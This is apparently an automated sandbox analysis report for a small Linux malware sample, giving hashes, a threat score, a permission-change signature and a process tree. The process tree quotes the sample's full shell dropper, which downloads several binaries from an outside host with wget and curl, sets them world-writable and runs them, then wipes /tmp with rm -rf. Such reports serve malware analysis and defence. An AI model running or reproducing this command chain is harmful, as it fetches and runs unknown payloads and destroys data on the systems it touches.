Analysis
max time kernel: 148s
max time network: 128s
platform: ubuntu-18.04_amd64
resource: ubuntu1804-amd64-20240729-en
resource tags: arch:amd64, arch:i386, image:ubuntu1804-amd64-20240729-en, kernel:4.15.0-213-generic, locale:en-us, os:ubuntu-18.04-amd64, system
submitted: 25/12/2024, 13:55
Behavioral task: behavioral1
Sample: d318e9f2086c3cf2a258e275f9c63929b4560744a504ced68622b2e0b3f56374
Resource: ubuntu1804-amd64-20240729-en
1 signatures
150 seconds
General
Target: d318e9f2086c3cf2a258e275f9c63929b4560744a504ced68622b2e0b3f56374
Size: 1KB
MD5: 6b13e69cc37757b1f2dbc2a1c8f806f1
SHA1: 01364dc40e5f1005fd7cd6e087368d64b35896f7
SHA256: d318e9f2086c3cf2a258e275f9c63929b4560744a504ced68622b2e0b3f56374
SHA512: c46a38378e024c06251f3aa61a35a2e31f2e6a17da1284d100d78de0708a1e0852b10da74d59ec888e374a3ed8c0533851e46410d0df48da901b151b086ffdab
Score: 7/10
Malware Config
Signatures
File and Directory Permissions Modification (1 TTPs, 2 IoCs)
Adversaries may modify file or directory permissions to evade defenses.
pid / Process: 1503 sh, 1505 chmod
Processes
/tmp/d318e9f2086c3cf2a258e275f9c63929b4560744a504ced68622b2e0b3f56374 (PID 1503)
  command: /tmp/d318e9f2086c3cf2a258e275f9c63929b4560744a504ced68622b2e0b3f56374
  /bin/sh (PID 1503) [File and Directory Permissions Modification]
    command: /bin/sh -c "wget -nc http://dash.cloudflare.ovh/mvt/incbit -q -P /var/tmp/; chmod 777 /var/tmp/incbit; curl http://dash.cloudflare.ovh/mvt/incbit -s -o /var/tmp/incbit; chmod 777 /var/tmp/incbit; cd /var/tmp; ./incbit; cd /var/tmp; rm incbit; wget -nc http://dash.cloudflare.ovh/mvt/lushput -q -P /tmp/; chmod 777 /tmp/lushput; curl http://dash.cloudflare.ovh/mvt/lushput -s -o /tmp/lushput; chmod 777 /tmp/lushput; cd /tmp; ./lushput 'wget -nc http://dash.cloudflare.ovh/mvt/bitnow -q -P /var/tmp/; chmod 777 /var/tmp/bitnow; curl http://dash.cloudflare.ovh/mvt/bitnow -s -o /var/tmp/bitnow; chmod 777 /var/tmp/bitnow; cd /var/tmp; ./bitnow; cd /var/tmp; rm bitnow' 2>/dev/null; cd /tmp; rm -rf *; cd /tmp; rm -rf .pkexec; wget -nc http://dash.cloudflare.ovh/mvt/seasbit -q -P /tmp/; chmod 777 /tmp/seasbit; curl http://dash.cloudflare.ovh/mvt/seasbit -s -o /tmp/seasbit; chmod 777 /tmp/seasbit; wget -nc http://dash.cloudflare.ovh/mvt/loadbit -q -P /tmp/; chmod 777 /tmp/loadbit; curl http://dash.cloudflare.ovh/mvt/loadbit -s -o /tmp/loadbit; chmod 777 /tmp/loadbit; cd /tmp; ./loadbit 2>/dev/null; cd /tmp; rm -rf *"
    /usr/bin/wget (PID 1504)
      command: wget -nc http://dash.cloudflare.ovh/mvt/incbit -q -P /var/tmp/
    /bin/chmod (PID 1505) [File and Directory Permissions Modification]
      command: chmod 777 /var/tmp/incbit
    /usr/bin/curl (PID 1506)
      command: curl http://dash.cloudflare.ovh/mvt/incbit -s -o /var/tmp/incbit